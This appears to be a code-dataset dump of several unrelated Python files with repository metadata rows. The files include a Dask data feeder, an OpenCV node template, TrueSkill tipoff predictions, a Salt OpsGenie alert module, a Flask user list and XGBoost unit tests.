                out.itemset(tuple([i, idx, value]), 1.0)
          else:
            out[i] = y
      if self.y is None:
        return {self._input_placeholder.name: inp}
      return {self._input_placeholder.name: inp,
              self._output_placeholder.name: out}

    return _feed_dict_fn
class DaskDataFeeder(object):
  """Data feeder for that reads data from dask.Series and dask.DataFrame.

  Numpy arrays can be serialized to disk and it's possible to do random seeks
  into them. DaskDataFeeder will remove requirement to have full dataset in the
  memory and still do random seeks for sampling of batches.

  Parameters:
    x: iterator that returns for each element, returns features.
    y: iterator that returns for each element, returns 1 or many classes /
      regression values.
    n_classes: indicator of how many classes the target has.
    batch_size: Mini batch size to accumulate.
    random_state: random state for RNG. Note that it will mutate so use a
      int value for this if you want consistent sized batches.

  Attributes:
    x: input features.
    y: input target.
    n_classes: number of classes.
    batch_size: mini batch size to accumulate.
    input_shape: shape of the input.
    output_shape: shape of the output.
    input_dtype: dtype of input.
    output_dtype: dtype of output.
  """

  def __init__(self, x, y, n_classes, batch_size, shuffle=True,
               random_state=None, epochs=None):
    # pylint: disable=invalid-name,super-init-not-called
    import dask.dataframe as dd  # pylint: disable=g-import-not-at-top
    # TODO(terrytangyuan): check x and y dtypes in dask_io like pandas
    self.x = x
    self.y = y
    # save column names
    self.x_columns = list(x.columns)
    if isinstance(y.columns[0], str):
      self.y_columns = list(y.columns)
    else:
      # deal with cases where two DFs have overlapped default numeric colnames
      self.y_columns = len(self.x_columns) + 1
      self.y = self.y.rename(columns={y.columns[0]: self.y_columns})

    # TODO(terrytangyuan): deal with unsupervised cases
    # combine into a data frame
    self.df = dd.multi.concat([self.x, self.y], axis=1)
    self.n_classes = n_classes

    # Counting forces a (lazy) dask computation to learn the dataset size.
    x_count = x.count().compute()[0]
    x_shape = (x_count, len(self.x.columns))
    y_shape = (x_count, len(self.y.columns))
    # TODO(terrytangyuan): Add support for shuffle and epochs.
    self.shuffle = shuffle
    self.epochs = epochs
    self.input_shape, self.output_shape, self._batch_size = _get_in_out_shape(
        x_shape, y_shape, n_classes, batch_size)
    # Fraction of rows that random_split must take to approximate one batch.
    self.sample_fraction = self._batch_size / float(x_count)
    # TODO(ptucker,ipolosukhin): Remove this?
    # TODO(ipolosukhin): remove or restore.
    # self.x.dtypes[0], self.y.dtypes[self.y_columns]
    self.input_dtype, self.output_dtype = np.float32, np.float32
    if random_state is None:
      self.random_state = 66
    else:
      self.random_state = random_state

  def get_feed_params(self):
    """Function returns a dict with data feed params while training.

    Returns:
      A dict with data feed params while training.
    """
    return {'batch_size': self._batch_size}

  def get_feed_dict_fn(self, input_placeholder, output_placeholder):
    """Returns a function, that will sample data and provide it to placeholders.

    Args:
      input_placeholder: tf.Placeholder for input features mini batch.
      output_placeholder: tf.Placeholder for output targets.

    Returns:
      A function that when called samples a random subset of batch size
      from x and y.
    """
    def _feed_dict_fn():
      """Samples data and provides it to placeholders."""
      # TODO(ipolosukhin): option for with/without replacement (dev version of
      # dask)
      sample = self.df.random_split(
          [self.sample_fraction, 1 - self.sample_fraction],
          random_state=self.random_state)
      inp = extract_pandas_matrix(sample[0][self.x_columns].compute()).tolist()
      out = extract_pandas_matrix(sample[0][self.y_columns].compute())
      # convert to correct dtype
      inp = np.array(inp, dtype=self.input_dtype)
      # one-hot encode out for each class for cross entropy loss
      if HAS_PANDAS:
        import pandas as pd  # pylint: disable=g-import-not-at-top
        if not isinstance(out, pd.Series):
          out = out.flatten()
      # Class count is derived from the max label value in y.
      out_max = self.y.max().compute().values[0]
      encoded_out = np.zeros((out.size, out_max + 1), dtype=self.output_dtype)
      encoded_out[np.arange(out.size), out] = 1
      return {input_placeholder.name: inp,
              output_placeholder.name: encoded_out}

    return _feed_dict_fn
| 34.493243 | 100 | 0.673506 |
acfb6b6d893b6c7d222c49925ba14cae9c546cea | 1,566 | py | Python | packages/OpenCV/nodes/OpenCV___ThresholdAdaptiveMean0/OpenCV___ThresholdAdaptiveMean0___METACODE.py | lidong1266/Ryven-Switch | 68d1f71e81d6564196f44ca49d5903f06db6a4d9 | [
"MIT"
] | 18 | 2021-01-18T09:52:41.000Z | 2022-03-22T10:48:44.000Z | packages/OpenCV/nodes/OpenCV___ThresholdAdaptiveMean0/OpenCV___ThresholdAdaptiveMean0___METACODE.py | xamofb-xsk/Ryven | 8c3dcc613098863ae9fb747e62c0bb9d9eb4cef1 | [
"MIT"
] | null | null | null | packages/OpenCV/nodes/OpenCV___ThresholdAdaptiveMean0/OpenCV___ThresholdAdaptiveMean0___METACODE.py | xamofb-xsk/Ryven | 8c3dcc613098863ae9fb747e62c0bb9d9eb4cef1 | [
"MIT"
] | 3 | 2021-01-18T09:49:42.000Z | 2022-03-22T10:48:47.000Z | from NIENV import *
# API METHODS
# self.main_widget <- access to main widget
# Ports
# self.input(index) <- access to input data
# set_output_val(self, index, val) <- set output data port value
# self.exec_output(index) <- executes an execution output
# self.create_new_input(type_, label, widget_name=None, widget_pos='under', pos=-1)
# self.delete_input(index or input)
# self.create_new_output(type_, label, pos=-1)
# self.delete_output(index or output)
# Logging
# mylog = self.new_log('Example Log')
# mylog.log('I\'m alive!!')
# self.log_message('hello global!', 'global')
# self.log_message('that\'s not good', 'error')
# ------------------------------------------------------------------------------
import cv2
class %CLASS%(NodeInstance):
    # NOTE: %CLASS% is a metacode placeholder substituted by Ryven's node
    # generator -- this file is a template, not directly importable Python.
    # The node applies OpenCV adaptive mean thresholding to the image on
    # input 0 and shows/outputs the binary result.

    def __init__(self, params):
        super(%CLASS%, self).__init__(params)

        # self.special_actions['action name'] = {'method': M(self.action_method)}
        # ...

    # don't call self.update_event() directly, use self.update() instead
    def update_event(self, input_called=-1):
        # Input 0: source image (converted BGR -> grayscale below).
        # Input 1: maxValue assigned to pixels passing the threshold.
        # blockSize=11 and C=2 are hard-coded.
        self.image = self.input(0)
        grayImage = cv2.cvtColor(self.image, cv2.COLOR_BGR2GRAY)
        result = cv2.adaptiveThreshold(grayImage, self.input(1), cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 11, 2)
        self.main_widget.show_image(result)
        self.set_output_val(0, result)

    def get_data(self):
        # No node-specific state is persisted yet.
        data = {}
        # ...
        return data

    def set_data(self, data):
        pass # ...

    def remove_event(self):
        pass
| 27.964286 | 118 | 0.61175 |
acfb6b81d1729596ded9d2af9fdd52e2be8482b5 | 1,255 | py | Python | src/stk/molecular/key_makers/smiles.py | andrewtarzia/stk | 1ac2ecbb5c9940fe49ce04cbf5603fd7538c475a | [
"MIT"
] | 21 | 2018-04-12T16:25:24.000Z | 2022-02-14T23:05:43.000Z | src/stk/molecular/key_makers/smiles.py | JelfsMaterialsGroup/stk | 0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2 | [
"MIT"
] | 8 | 2019-03-19T12:36:36.000Z | 2020-11-11T12:46:00.000Z | src/stk/molecular/key_makers/smiles.py | supramolecular-toolkit/stk | 0d3e1b0207aa6fa4d4d5ee8dfe3a29561abb08a2 | [
"MIT"
] | 5 | 2018-08-07T13:00:16.000Z | 2021-11-01T00:55:10.000Z | """
SMILES
======
"""
from .molecule import MoleculeKeyMaker
from .utilities import get_smiles
__all__ = (
'Smiles',
)
class Smiles(MoleculeKeyMaker):
"""
Used to get the SMILES of molecules.
Examples:
*Adding SMILES to a Molecule's JSON*
You want to use the isomeric, canonical SMILES from RDKit as
part of a JSON representation of a molecule
.. testcode:: adding-smiles-to-a-molecules-json
import stk
jsonizer = stk.MoleculeJsonizer(
key_makers=(stk.Smiles(), ),
)
# Get the JSON representation, including an SMILES.
json = jsonizer.to_json(stk.BuildingBlock('NCCN'))
.. testcode:: adding-smiles-to-a-molecules-json
:hide:
assert json['molecule']['SMILES'] == 'NCCN'
assert json['matrix']['SMILES'] == 'NCCN'
"""
def __init__(self) -> None:
"""
Initialize a :class:`.Smiles` instance.
"""
MoleculeKeyMaker.__init__(
self=self,
key_name='SMILES',
get_key=get_smiles,
)
def __str__(self) -> str:
return repr(self)
def __repr__(self) -> str:
return 'Smiles()'
| 20.241935 | 68 | 0.555378 |
acfb6bd89e2bf0508499b4010e890971ec5a8907 | 483 | py | Python | tests/function.py | btalebali/pysphere | cda8bbc480f9942911fb8f9c7f3c5c9a4da8bd43 | [
"Unlicense"
] | null | null | null | tests/function.py | btalebali/pysphere | cda8bbc480f9942911fb8f9c7f3c5c9a4da8bd43 | [
"Unlicense"
] | null | null | null | tests/function.py | btalebali/pysphere | cda8bbc480f9942911fb8f9c7f3c5c9a4da8bd43 | [
"Unlicense"
] | null | null | null | import time
import threading
import os
import urllib2
import mmap
import sys, re, getpass, argparse, subprocess
from urlparse import urlparse
from time import sleep
from pysphere import VIServer, MORTypes
from pysphere import VIProperty, VITask,VIException, FaultTypes
from pysphere.vi_virtual_machine import VIVirtualMachine
from pysphere.resources import VimService_services as VI
from pysphere.vi_mor import VIMor
from pysphere import vi_task
from pysphere.ZSI import fault
| 24.15 | 64 | 0.84472 |
acfb6bea34e4f21d414dc262f6f49c3c957210d9 | 5,840 | py | Python | src/skill_algorithms/trueskill_data_processing.py | EllAchE/nba_tipoff | f3820e391d4a6ddb611efeb6c709f16876771684 | [
"MIT"
] | null | null | null | src/skill_algorithms/trueskill_data_processing.py | EllAchE/nba_tipoff | f3820e391d4a6ddb611efeb6c709f16876771684 | [
"MIT"
] | null | null | null | src/skill_algorithms/trueskill_data_processing.py | EllAchE/nba_tipoff | f3820e391d4a6ddb611efeb6c709f16876771684 | [
"MIT"
] | null | null | null | import ENVIRONMENT
from src.database.database_creation import createPlayerTrueSkillDictionary
from src.skill_algorithms.algorithms import trueSkillMatchWithRawNums, trueSkillTipWinProb
from src.skill_algorithms.common_data_processing import beforeMatchPredictions, runAlgoForSeason, runAlgoForAllSeasons
# backlogtodo optimize trueskill, glicko etc. for rapid iteration
# backlogtodo refactor equations here to be generic
def runTrueSkillForSeason(seasonCsv: str, winningBetThreshold: float = ENVIRONMENT.TS_TIPOFF_ODDS_THRESHOLD, startFromBeginning=False):
    """Runs the TrueSkill update/prediction pipeline over one season CSV.

    Args:
        seasonCsv: path to the season's game CSV.
        winningBetThreshold: minimum predicted tip-win probability before a
            bet is recorded. Fix: previously defaulted to
            GLICKO_TIPOFF_ODDS_THRESHOLD, which belongs to the Glicko
            pipeline; every sibling TrueSkill function uses the TS threshold.
        startFromBeginning: when True, reprocess the season from the first
            game instead of resuming after the last processed game.
    """
    runAlgoForSeason(seasonCsv, ENVIRONMENT.PLAYER_TRUESKILL_DICT_PATH, ENVIRONMENT.TS_PREDICTION_SUMMARIES_PATH,
                     trueSkillBeforeMatchPredictions, trueSkillUpdateDataSingleTipoff, winningBetThreshold,
                     columnAdds=['Home TS Mu', 'Away TS Mu', 'Home TS Sigma', 'Away TS Sigma', 'Home Lifetime Appearances',
                                 'Away Lifetime Appearances', 'Home Tipper Wins', 'Away Tipper Wins', 'Home Tipper Losses', 'Away Tipper Losses'], startFromBeginning=startFromBeginning)
# backlogtodo setup odds prediction to use Ev or win prob rather than bet threshold
# Thin adapter over the shared beforeMatchPredictions() pipeline that plugs in
# the TrueSkill win-probability function, summary path, and appearance/odds
# thresholds.
def trueSkillBeforeMatchPredictions(psd, homePlayerCode, awayPlayerCode, homeTeam, awayTeam, tipWinnerCode, scoringTeam, predictionArray=None, actualArray=None, histogramPredictionsDict=None,
                                    winningBetThreshold=ENVIRONMENT.TS_TIPOFF_ODDS_THRESHOLD):
    return beforeMatchPredictions(psd, homePlayerCode, awayPlayerCode, homeTeam, awayTeam, tipWinnerCode, scoringTeam, predictionArray=predictionArray, actualArray=actualArray, histogramPredictionsDict=histogramPredictionsDict, predictionSummaryPath=ENVIRONMENT.TS_PREDICTION_SUMMARIES_PATH,
                                  minimumTipWinPercentage=winningBetThreshold, predictionFunction=trueSkillTipWinProb, minimumAppearances=ENVIRONMENT.MIN_TS_APPEARANCES)
# Same pipeline as runTrueSkillForSeason but replayed over every season in
# `seasons` via the shared runAlgoForAllSeasons() driver.
def runTSForAllSeasons(seasons, winningBetThreshold=ENVIRONMENT.TS_TIPOFF_ODDS_THRESHOLD):
    runAlgoForAllSeasons(seasons, ENVIRONMENT.PLAYER_TRUESKILL_DICT_PATH, ENVIRONMENT.TS_PREDICTION_SUMMARIES_PATH, trueSkillBeforeMatchPredictions, trueSkillUpdateDataSingleTipoff,
                         winningBetThreshold, columnAdds=['Home TS Mu', 'Away TS Mu', 'Home TS Sigma', 'Away TS Sigma', 'Home Lifetime Appearances',
                         'Away Lifetime Appearances', 'Home Tipper Wins', 'Away Tipper Wins', 'Home Tipper Losses', 'Away Tipper Losses'])
def trueSkillUpdateDataSingleTipoff(psd, winnerCode, loserCode, homePlayerCode, game_code=None):
    """Applies one tipoff result to the TrueSkill dict; returns pre-match features.

    Args:
        psd: player-skill dict keyed by (stripped) player code; each entry
            has "mu", "sigma", "wins", "losses" and "appearances".
        winnerCode: tip winner's code carrying an 11-character prefix that is
            stripped below (presumably a date/game prefix -- confirm upstream).
        loserCode: tip loser's code, same prefix convention.
        homePlayerCode: already-stripped code of the home team's tipper.
        game_code: optional game identifier, printed for traceability.

    Returns:
        Dict of feature columns for the game row. All values are the tippers'
        PRE-match stats, i.e. before this tipoff is counted. Fix: previously
        the two branches disagreed -- the home-winner branch returned
        pre-match appearances/wins while the home-loser branch returned
        post-match appearances, and losses included the current game while
        wins did not.

    Raises:
        ValueError: if homePlayerCode matches neither participant.
    """
    if game_code:
        print(game_code)
    winnerCode = winnerCode[11:]
    loserCode = loserCode[11:]

    # Snapshot PRE-match stats before mutating psd so the returned feature
    # columns are consistent for both participants.
    winnerPre = dict(psd[winnerCode])
    loserPre = dict(psd[loserCode])

    winnerOgMu = winnerPre["mu"]
    winnerOgSigma = winnerPre["sigma"]
    loserOgMu = loserPre["mu"]
    loserOgSigma = loserPre["sigma"]
    winnerMu, winnerSigma, loserMu, loserSigma = trueSkillMatchWithRawNums(winnerOgMu, winnerOgSigma, loserOgMu, loserOgSigma)

    winnerWinCount = winnerPre["wins"] + 1
    winnerAppearances = winnerPre["appearances"] + 1
    loserLosses = loserPre["losses"] + 1
    loserAppearances = loserPre["appearances"] + 1

    psd[winnerCode]["wins"] = winnerWinCount
    psd[winnerCode]["appearances"] = winnerAppearances
    psd[loserCode]["losses"] = loserLosses
    psd[loserCode]["appearances"] = loserAppearances
    psd[winnerCode]["mu"] = winnerMu
    psd[winnerCode]["sigma"] = winnerSigma
    psd[loserCode]["mu"] = loserMu
    psd[loserCode]["sigma"] = loserSigma

    print('Winner:', winnerCode, 'trueskill increased', winnerMu - winnerOgMu, 'to', winnerMu, '. Sigma is now', winnerSigma, '. W:', winnerWinCount, 'L', winnerAppearances - winnerWinCount)
    print('Loser:', loserCode, 'trueskill decreased', loserMu - loserOgMu, 'to', loserMu, '. Sigma is now', loserSigma, '. W:', loserAppearances - loserLosses, 'L', loserLosses)

    if homePlayerCode == winnerCode:
        homePre, awayPre = winnerPre, loserPre
    elif homePlayerCode == loserCode:
        homePre, awayPre = loserPre, winnerPre
    else:
        raise ValueError('neither code matches')

    return {"Home TS Mu": homePre["mu"], "Home TS Sigma": homePre["sigma"],
            "Away TS Mu": awayPre["mu"], "Away TS Sigma": awayPre["sigma"],
            "Home Lifetime Appearances": homePre["appearances"],
            "Away Lifetime Appearances": awayPre["appearances"],
            "Home Tipper Wins": homePre["wins"], "Home Tipper Losses": homePre["losses"],
            "Away Tipper Wins": awayPre["wins"], "Away Tipper Losses": awayPre["losses"]}
def calculateTrueSkillDictionaryFromZero():
    # Full rebuild: reset the stored TrueSkill ratings, then replay every
    # recorded season to recompute them.
    createPlayerTrueSkillDictionary() # clears the stored values,
    runTSForAllSeasons(ENVIRONMENT.ALL_SEASONS_LIST, winningBetThreshold=ENVIRONMENT.TS_TIPOFF_ODDS_THRESHOLD)
    print("\n", "trueskill dictionary updated for seasons", ENVIRONMENT.ALL_SEASONS_LIST, "\n")
def updateTrueSkillDictionaryFromLastGame():
    # Incremental update: resume the current season after the last processed
    # game (startFromBeginning=False).
    runTrueSkillForSeason(ENVIRONMENT.CURRENT_SEASON_CSV, winningBetThreshold=ENVIRONMENT.TS_TIPOFF_ODDS_THRESHOLD, startFromBeginning=False)
    print("\n", "trueskill dictionary updated from last game", "\n")
| 62.12766 | 291 | 0.738356 |
acfb6c07e38ad8fa6aaccccaa3f8fba6e7b62444 | 319 | py | Python | requests_testing.py | ingxfm/python-web-modules-testing | a6eaeb6a6f77924784ba6f74c1e9c3df313d07e4 | [
"MIT"
] | null | null | null | requests_testing.py | ingxfm/python-web-modules-testing | a6eaeb6a6f77924784ba6f74c1e9c3df313d07e4 | [
"MIT"
] | null | null | null | requests_testing.py | ingxfm/python-web-modules-testing | a6eaeb6a6f77924784ba6f74c1e9c3df313d07e4 | [
"MIT"
] | null | null | null | # Python Standard libraries
# 3rd-party libraries
import requests
# Local libraries
res = requests.get('https://automatetheboringstuff.com/files/rj.txt')
#print(type(res))
try:
res.raise_for_status()
except Exception as exc:
print('There was a problem: %s' % (exc))
print(res.text[:262])
| 17.722222 | 70 | 0.677116 |
acfb6c10f8763b2c87ee071985b9858465a1eadb | 814 | py | Python | active_user_service.py | srtsignin/ActiveUserService-Spike | 8f6248d48ea4a71b3c60983e9c72b3feb8d62754 | [
"MIT"
] | null | null | null | active_user_service.py | srtsignin/ActiveUserService-Spike | 8f6248d48ea4a71b3c60983e9c72b3feb8d62754 | [
"MIT"
] | null | null | null | active_user_service.py | srtsignin/ActiveUserService-Spike | 8f6248d48ea4a71b3c60983e9c72b3feb8d62754 | [
"MIT"
] | null | null | null | from flask import Flask
from flask import request
import json
app = Flask(__name__)
active_users = list()
@app.route('/', methods=['GET', 'POST', 'DELETE'])
def handle_request():
global active_users
if request.method == 'GET':
response = {
'activeUsers': active_users
}
return json.dumps(response)
if request.method == 'POST':
user = json.loads(request.data)
active_users.append(user)
response = {
'userAdded': user,
'activeUsers': active_users
}
return json.dumps(response)
active_users.clear()
response = {
'result': 'Success',
'activeUsers': active_users
}
return json.dumps(response)
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', port=65001) | 24.666667 | 51 | 0.595823 |
acfb6c55207feb3626e3f1317df307629ad0a149 | 787 | py | Python | src/meltano/core/setting.py | siilats/meltano | 404605c83f441c3fc2b729e26416c6caa8b0ed0b | [
"MIT"
] | 122 | 2021-06-21T17:30:29.000Z | 2022-03-25T06:21:38.000Z | src/meltano/core/setting.py | siilats/meltano | 404605c83f441c3fc2b729e26416c6caa8b0ed0b | [
"MIT"
] | null | null | null | src/meltano/core/setting.py | siilats/meltano | 404605c83f441c3fc2b729e26416c6caa8b0ed0b | [
"MIT"
] | 21 | 2021-06-22T10:08:15.000Z | 2022-03-18T08:57:02.000Z | import logging
import os
import sqlalchemy.types as types
from sqlalchemy import Column, UniqueConstraint
from .models import SystemModel
from .utils import nest
class Setting(SystemModel):
__tablename__ = "plugin_settings"
# represent the mapping to the ENV
label = Column(types.String)
description = Column(types.Text)
# represent a materialized path to support
# a nested configuration.
name = Column(types.String, primary_key=True)
namespace = Column(types.String, primary_key=True, nullable=True)
value = Column(types.PickleType)
enabled = Column(types.Boolean, default=False)
def __repr__(self):
enabled_marker = "E" if self.enabled else ""
return f"<({self.namespace}) {self.name}={self.value} {enabled_marker}>"
| 28.107143 | 80 | 0.721728 |
acfb6d2964366ced89e8e844ee4902b958558c91 | 1,448 | py | Python | Secao9_ComprehensionEmPython/ListasAninhadas.py | PauloFTeixeira/curso_python | 9040c7dcc5262620f6330bb9637710bb8899bc6b | [
"MIT"
] | null | null | null | Secao9_ComprehensionEmPython/ListasAninhadas.py | PauloFTeixeira/curso_python | 9040c7dcc5262620f6330bb9637710bb8899bc6b | [
"MIT"
] | null | null | null | Secao9_ComprehensionEmPython/ListasAninhadas.py | PauloFTeixeira/curso_python | 9040c7dcc5262620f6330bb9637710bb8899bc6b | [
"MIT"
] | null | null | null | """
Listas aninhadas - (nested list)
Em algumas linguagens, tem-se arrays (C, Java)
- Unidimensional (arrays/vetores)
- Multidimensionais (matrizes)
Em python, se tem as listas aninhadas
Exemplo:
lista = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
Obs.: Cada sublista é uma linha
Cada numero é uma coluna
Acesso aos dados
print(lista[linha][coluna])
------------------------------------------------------------------------------------------------------------------
# ACESSANDO DADOS
lista = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
print(lista[0][0])
------------------------------------------------------------------------------------------------------------------
# ITERANDO COM LOOP EM LISTA ANINHADA
for list in lista:
for num in list:
print(num)
------------------------------------------------------------------------------------------------------------------
# LIST COMPREHENSION
[[print(valor) for valor in list]for list in lista]
# OBS.: toda instrução comprehension, se lê de trás pra frente
------------------------------------------------------------------------------------------------------------------
"""
# OTHER EXAMPLES
# BUILDING A 3X3 BOARD/MATRIX
tabuleiro = [[numero for numero in range(1, 4)] for valor in range(1, 4)]
print(tabuleiro)
# GENERATING TIC-TAC-TOE MOVES
velha = [['x' if numero % 2 == 0 else '0' for numero in range(1, 4)] for valor in range(1, 4)]
print(velha)
| 22.625 | 114 | 0.446823 |
acfb6d37e5d7640cd27cbcbef5206d7fb74d502f | 3,072 | py | Python | salt/modules/opsgenie.py | yuanbaopapa/salt | c46490c18394799b5ea5d115c4500080cf41ef91 | [
"Apache-2.0"
] | 1 | 2021-08-14T13:48:38.000Z | 2021-08-14T13:48:38.000Z | salt/modules/opsgenie.py | yuanbaopapa/salt | c46490c18394799b5ea5d115c4500080cf41ef91 | [
"Apache-2.0"
] | 3 | 2015-03-31T14:44:05.000Z | 2015-06-18T19:02:24.000Z | salt/modules/opsgenie.py | yuanbaopapa/salt | c46490c18394799b5ea5d115c4500080cf41ef91 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Module for sending data to OpsGenie
.. versionadded:: Oxygen
:configuration: This module can be used in Reactor System for
posting data to OpsGenie as a remote-execution function.
For example:
.. code-block:: yaml
opsgenie_event_poster:
local.opsgenie.post_data:
- tgt: 'salt-minion'
- kwarg:
name: event.reactor
api_key: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
reason: {{ data['data']['reason'] }}
action_type: Create
'''
# Import Python libs
from __future__ import absolute_import
import json
import logging
import requests
# Import Salt libs
import salt.exceptions
API_ENDPOINT = "https://api.opsgenie.com/v1/json/saltstack?apiKey="
log = logging.getLogger(__name__)
def post_data(api_key=None, name='OpsGenie Execution Module', reason=None,
              action_type=None):
    '''
    Post data to OpsGenie. It's designed for Salt's Event Reactor.
    After configuring the sls reaction file as shown above, you can trigger the
    module with your designated tag (og-tag in this case).
    CLI Example:
    .. code-block:: bash
        salt-call event.send 'og-tag' '{"reason" : "Overheating CPU!"}'
    Required parameters:
    api_key
        It's the API Key you've copied while adding integration in OpsGenie.
    reason
        It will be used as alert's default message in OpsGenie.
    action_type
        OpsGenie supports the default values Create/Close for action_type. You
        can customize this field with OpsGenie's custom actions for other
        purposes like adding notes or acknowledging alerts.
    Optional parameters:
    name
        It will be used as alert's alias. If you want to use the close
        functionality you must provide name field for both states like in
        this case.
    Returns a ``(status_code, body_text)`` tuple from the OpsGenie response.
    '''
    if api_key is None or reason is None or action_type is None:
        raise salt.exceptions.SaltInvocationError(
            'API Key or Reason or Action Type cannot be None.')
    # Alert payload plus minion identity/platform grains.
    data = {
        'name': name,
        'reason': reason,
        'actionType': action_type,
        'cpuModel': __grains__['cpu_model'],
        'cpuArch': __grains__['cpuarch'],
        'fqdn': __grains__['fqdn'],
        'host': __grains__['host'],
        'id': __grains__['id'],
        'kernel': __grains__['kernel'],
        'kernelRelease': __grains__['kernelrelease'],
        'master': __grains__['master'],
        'os': __grains__['os'],
        'saltPath': __grains__['saltpath'],
        'saltVersion': __grains__['saltversion'],
        'username': __grains__['username'],
        'uuid': __grains__['uuid'],
    }
    # Lazy %-style logging args instead of eager string concatenation.
    # SECURITY: the API key is a credential -- never write it to the logs
    # (the previous code logged it at debug level).
    log.debug('Below data will be posted:\n%s', data)
    log.debug('API Endpoint: %s', API_ENDPOINT)
    # NOTE(review): no timeout= is passed, so this call can block indefinitely
    # on an unresponsive endpoint -- consider adding one.
    response = requests.post(url=API_ENDPOINT + api_key, data=json.dumps(data),
                             headers={'Content-Type': 'application/json'})
    return response.status_code, response.text
| 31.030303 | 79 | 0.651693 |
acfb6db560befd2a280702d409f8b889bcdc981a | 12,263 | py | Python | tests/python/test_basic.py | sanchitanand/xgboost | b3193052b31e3e984f0f3d9c2c67ae3c2e114f9b | [
"Apache-2.0"
] | 2 | 2021-03-07T15:27:46.000Z | 2021-03-07T15:32:28.000Z | tests/python/test_basic.py | sanchitanand/xgboost | b3193052b31e3e984f0f3d9c2c67ae3c2e114f9b | [
"Apache-2.0"
] | 1 | 2020-07-20T17:18:36.000Z | 2020-07-20T17:18:36.000Z | tests/python/test_basic.py | sanchitanand/xgboost | b3193052b31e3e984f0f3d9c2c67ae3c2e114f9b | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import sys
from contextlib import contextmanager
from io import StringIO
import numpy as np
import os
import xgboost as xgb
import unittest
import json
from pathlib import Path
import tempfile
dpath = 'demo/data/'
rng = np.random.RandomState(1994)
@contextmanager
def captured_output():
"""Reassign stdout temporarily in order to test printed statements
Taken from:
https://stackoverflow.com/questions/4219717/how-to-assert-output-with-nosetest-unittest-in-python
Also works for pytest.
"""
new_out, new_err = StringIO(), StringIO()
old_out, old_err = sys.stdout, sys.stderr
try:
sys.stdout, sys.stderr = new_out, new_err
yield sys.stdout, sys.stderr
finally:
sys.stdout, sys.stderr = old_out, old_err
class TestBasic(unittest.TestCase):
def test_compat(self):
from xgboost.compat import lazy_isinstance
a = np.array([1, 2, 3])
assert lazy_isinstance(a, 'numpy', 'ndarray')
assert not lazy_isinstance(a, 'numpy', 'dataframe')
def test_basic(self):
dtrain = xgb.DMatrix(dpath + 'agaricus.txt.train')
dtest = xgb.DMatrix(dpath + 'agaricus.txt.test')
param = {'max_depth': 2, 'eta': 1,
'objective': 'binary:logistic'}
# specify validations set to watch performance
watchlist = [(dtrain, 'train')]
num_round = 2
bst = xgb.train(param, dtrain, num_round, watchlist, verbose_eval=True)
preds = bst.predict(dtrain)
labels = dtrain.get_label()
err = sum(1 for i in range(len(preds))
if int(preds[i] > 0.5) != labels[i]) / float(len(preds))
# error must be smaller than 10%
assert err < 0.1
preds = bst.predict(dtest)
labels = dtest.get_label()
err = sum(1 for i in range(len(preds))
if int(preds[i] > 0.5) != labels[i]) / float(len(preds))
# error must be smaller than 10%
assert err < 0.1
with tempfile.TemporaryDirectory() as tmpdir:
dtest_path = os.path.join(tmpdir, 'dtest.dmatrix')
# save dmatrix into binary buffer
dtest.save_binary(dtest_path)
# save model
model_path = os.path.join(tmpdir, 'model.booster')
bst.save_model(model_path)
# load model and data in
bst2 = xgb.Booster(model_file=model_path)
dtest2 = xgb.DMatrix(dtest_path)
preds2 = bst2.predict(dtest2)
# assert they are the same
assert np.sum(np.abs(preds2 - preds)) == 0
def test_record_results(self):
dtrain = xgb.DMatrix(dpath + 'agaricus.txt.train')
dtest = xgb.DMatrix(dpath + 'agaricus.txt.test')
param = {'max_depth': 2, 'eta': 1, 'verbosity': 0,
'objective': 'binary:logistic'}
# specify validations set to watch performance
watchlist = [(dtest, 'eval'), (dtrain, 'train')]
num_round = 2
result = {}
res2 = {}
xgb.train(param, dtrain, num_round, watchlist,
callbacks=[xgb.callback.record_evaluation(result)])
xgb.train(param, dtrain, num_round, watchlist,
evals_result=res2)
assert result['train']['error'][0] < 0.1
assert res2 == result
def test_multiclass(self):
dtrain = xgb.DMatrix(dpath + 'agaricus.txt.train')
dtest = xgb.DMatrix(dpath + 'agaricus.txt.test')
param = {'max_depth': 2, 'eta': 1, 'verbosity': 0, 'num_class': 2}
# specify validations set to watch performance
watchlist = [(dtest, 'eval'), (dtrain, 'train')]
num_round = 2
bst = xgb.train(param, dtrain, num_round, watchlist)
# this is prediction
preds = bst.predict(dtest)
labels = dtest.get_label()
err = sum(1 for i in range(len(preds))
if preds[i] != labels[i]) / float(len(preds))
# error must be smaller than 10%
assert err < 0.1
with tempfile.TemporaryDirectory() as tmpdir:
dtest_path = os.path.join(tmpdir, 'dtest.buffer')
model_path = os.path.join(tmpdir, 'xgb.model')
# save dmatrix into binary buffer
dtest.save_binary(dtest_path)
# save model
bst.save_model(model_path)
# load model and data in
bst2 = xgb.Booster(model_file=model_path)
dtest2 = xgb.DMatrix(dtest_path)
preds2 = bst2.predict(dtest2)
# assert they are the same
assert np.sum(np.abs(preds2 - preds)) == 0
def test_dump(self):
data = np.random.randn(100, 2)
target = np.array([0, 1] * 50)
features = ['Feature1', 'Feature2']
dm = xgb.DMatrix(data, label=target, feature_names=features)
params = {'objective': 'binary:logistic',
'eval_metric': 'logloss',
'eta': 0.3,
'max_depth': 1}
bst = xgb.train(params, dm, num_boost_round=1)
# number of feature importances should == number of features
dump1 = bst.get_dump()
self.assertEqual(len(dump1), 1, "Expected only 1 tree to be dumped.")
self.assertEqual(len(dump1[0].splitlines()), 3,
"Expected 1 root and 2 leaves - 3 lines in dump.")
dump2 = bst.get_dump(with_stats=True)
self.assertEqual(dump2[0].count('\n'), 3,
"Expected 1 root and 2 leaves - 3 lines in dump.")
self.assertGreater(dump2[0].find('\n'), dump1[0].find('\n'),
"Expected more info when with_stats=True is given.")
dump3 = bst.get_dump(dump_format="json")
dump3j = json.loads(dump3[0])
self.assertEqual(dump3j["nodeid"], 0, "Expected the root node on top.")
dump4 = bst.get_dump(dump_format="json", with_stats=True)
dump4j = json.loads(dump4[0])
self.assertIn("gain", dump4j, "Expected 'gain' to be dumped in JSON.")
def test_load_file_invalid(self):
